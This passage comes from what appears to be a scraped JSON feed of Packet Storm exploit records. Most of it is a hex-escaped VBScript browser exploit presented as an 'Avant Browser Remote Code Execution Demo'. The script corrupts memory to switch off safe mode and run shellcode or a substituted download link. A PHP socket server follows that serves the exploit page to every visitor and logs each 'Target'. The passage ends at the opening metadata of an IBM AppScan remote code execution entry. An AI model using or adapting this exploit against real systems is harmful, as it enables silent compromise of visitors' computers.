x2B\\x20\\x35\\x2C\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x30\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x49\\x66\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x32\\x31\\x37\\x36\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x33\\x32\\x37\\x36\\x37\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x22\\x3C\\x62\\x72\\x3E\\x20\\x49\\x45\\x22\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x65\\x28\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x52\\x61\\x6E\\x64\\x6F\\x6D\\x69\\x7A\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x61\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x62\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x30\\x3D\\x31\\x33\\x2B\\x31\\x37\\x2A\\x72\\x6E\\x64\\x28\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x33\\x3D\\x37\\x2B\\x33\\x2A\\x72\\x6E\\x64\\x28\\x35\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x64\\x69\\x6D\\x20\\x69\\x0D\\x0A\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x46\\x6F\\x72\\x20\\x69\\x20\\x3D\\x20\\x30\\x20\\x54\\x6F\\x20\\x34\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x46\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x0D\\x0A\\x20\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x73\\x75\\x62\\x20\\x74\\x65\\x73\\x74\\x61\\x61\\x28\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x73\\x75\\x62\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x74\\x65\\x73\\x74\\x61\\x61\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x6E\\x75\\x6C\\x6C\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x69\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x36\\x2E\\x33\\x36\\x35\\x39\\x38\\x37\\x33\\x37\\x34\\x33\\x37\\x38\\x30\\x31\\x45\\x2D\\x33\\x31\\x34\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x37\\x34\\x30\\x38\\x38\\x35\\x33\\x34\\x37\\x33\\x31\\x33\\x32\\x34\\x45\\x2D\\x33\\x31\\x30\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x3D\\x61\\x61\\x28\\x61\\x31\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x38\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x31\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x33\\x34\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x66\\x6F\\x72\\x20\\x6B\\x3D\\x30\\x20\\x74\\x6F\\x20\\x26\\x68\\x36\\x30\\x20\\x73\\x74\\x65\\x70\\x20\\x34\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x6A\\x3D\\x31\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x28\\x69\\x2B\\x26\\x68\\x31\\x31\\x63\\x2B\\x6B\\x29\\x3D\\x61\\x62\\x28\\x34\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x66\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6E\\x65\\x78\\x74\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x64\\x69\\x6D\\x20\\x74\\x79\\x70\\x65\\x31\\x2C\\x74\\x79\\x70\\x65\\x32\\x2C\\x74\\x79\\x70\\x65\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x30\\x3D\\x61\\x30\\x2B\\x61\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x31\\x3D\\x61\\x30\\x2B\\x32\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x32\\x3D\\x61\\x30\\x2B\\x26\\x68\\x38\\x30\\x30\\x30\\x30\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x3D\\x31\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6D\\x65\\x6D\\x3D\\x63\\x69\\x6E\\x74\\x28\\x61\\x30\\x2B\\x31\\x29\\x2A\\x31\\x36\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x28\\x6A\\x3D\\x6D\\x65\\x6D\\x2B\\x34\\x29\\x20\\x6F\\x72\\x20\\x28\\x6A\\x2A\\x38\\x3D\\x6D\\x65\\x6D\\x2B\\x38\\x29\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x32\\x66\\x36\\x36\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x42\\x39\\x41\\x44\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6D\\x28\\x61\\x64\\x64\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x61\\x64\\x64\\x2B\\x34\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6D\\x3D\\x6C\\x65\\x6E\\x62\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x3C\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x3C\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x41\\x76\\x61\\x6E\\x74\\x20\\x42\\x72\\x6F\\x77\\x73\\x65\\x72\\x20\\x52\\x65\\x6D\\x6F\\x74\\x65\\x20\\x43\\x6F\\x64\\x65\\x20\\x45\\x78\\x65\\x63\\x75\\x74\\x69\\x6F\\x6E\\x20\\x44\\x65\\x6D\\x6F\\x3C\\x2F\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x0D\\x0A\\x20\\x3C\\x69\\x3E\\x45\\x68\\x73\\x61\\x6E\\x20\\x4E\\x6F\\x72\\x65\\x64\\x64\\x69\\x6E\\x69\\x20\\x2D\\x20\\x40\\x70\\x72\\x6F\\x74\\x33\\x63\\x74\\x30\\x72\\x3C\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x3C\\x69\\x3E\\x65\\x68\\x73\\x61\\x6E\\x6E\\x2E\\x69\\x6E\\x66\\x6F\\x3C\\x2F\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x2F\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x3C\\x2F\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x74\\x6D\\x6C\\x3E\"; \n$msgd=str_replace(\"DOWNLOAD\",$link,$msgd); \nfor (;;) { \nif ($client = @socket_accept($socket)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . \n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134061/theworldbrowser-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:21:55", "description": "", "cvss3": {}, "published": "2015-06-01T00:00:00", "type": "packetstorm", "title": "IBM Security AppScan 9.0.2 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, 